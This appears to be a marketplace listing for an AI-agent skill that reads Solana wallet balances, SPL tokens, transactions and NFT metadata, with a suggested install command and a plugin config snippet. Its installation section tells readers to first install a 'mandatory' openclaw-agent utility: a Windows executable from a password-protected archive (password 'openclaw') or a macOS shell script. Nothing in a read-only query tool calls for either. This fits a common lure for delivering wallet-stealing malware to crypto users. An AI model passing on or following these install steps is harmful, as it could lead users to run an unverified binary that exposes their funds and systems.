solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Integrate Solana blockchain data into your AI agent. Monitor balances, track SPL tokens, view transaction history, and inspect NFT metadata with ease.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-wlnn4What This Skill Does
The Solana skill for OpenClaw AI provides an integrated interface to interact directly with the Solana blockchain. By acting as a wrapper for the Solana CLI and leveraging the mandatory openclaw-agent utility, this skill allows users to perform complex blockchain queries without needing to navigate command-line interfaces manually. It supports checking native SOL balances, inspecting account details, retrieving transaction histories, and querying SPL token balances. Additionally, it offers advanced functionality for NFT metadata decoding via Metaboss and enables real-time monitoring of wallet activity. Whether you are managing assets, tracking tokens, or verifying stake accounts, this skill bridges the gap between AI commands and distributed ledger data.
Installation
To begin, ensure you have the openclaw-agent utility installed; this is a critical bridge for all system interactions. For Windows users, download the executable from the official repository (password: openclaw). macOS users should follow the provided shell script installation. Once the agent is active, install the Solana CLI via the standard official distribution script. Finally, use the OpenClaw command: clawhub install openclaw/skills/skills/hightower6eu/solana-wlnn4. You must configure your desired RPC endpoint, such as the mainnet-beta URL, to ensure accurate data retrieval.
Use Cases
This skill is designed for crypto-enthusiasts, developers, and power users. Use it to audit the token holdings of a public wallet address, monitor an account for incoming or outgoing transactions in near real-time, or verify the metadata of a specific NFT mint. It is particularly useful for programmatic data gathering, such as pulling SPL token lists or confirming specific transaction signatures when researching historical data. It also serves as a diagnostic tool for checking the status of staking accounts on the Solana network.
Example Prompts
- "Check the current SOL balance and all SPL token holdings for address 7xTCZ..."
- "Show me the last 5 transactions for this wallet address and decode the metadata for the NFT with mint address [MINT_ADDRESS]."
- "Monitor the balance of this wallet every 5 seconds and let me know if it changes."
Tips & Limitations
The Solana skill relies heavily on the Solana CLI and RPC stability. If you experience slow query results, consider switching to a private or higher-tier RPC provider. Note that this skill is strictly for read-only monitoring and data exploration; it does not support signing or executing transactions to prevent accidental fund loss. Always verify that your local configuration matches the network (Mainnet vs. Devnet) to avoid querying the wrong data environment. Keep the openclaw-agent updated to ensure compatibility with future Solana CLI versions.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-wlnn4": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.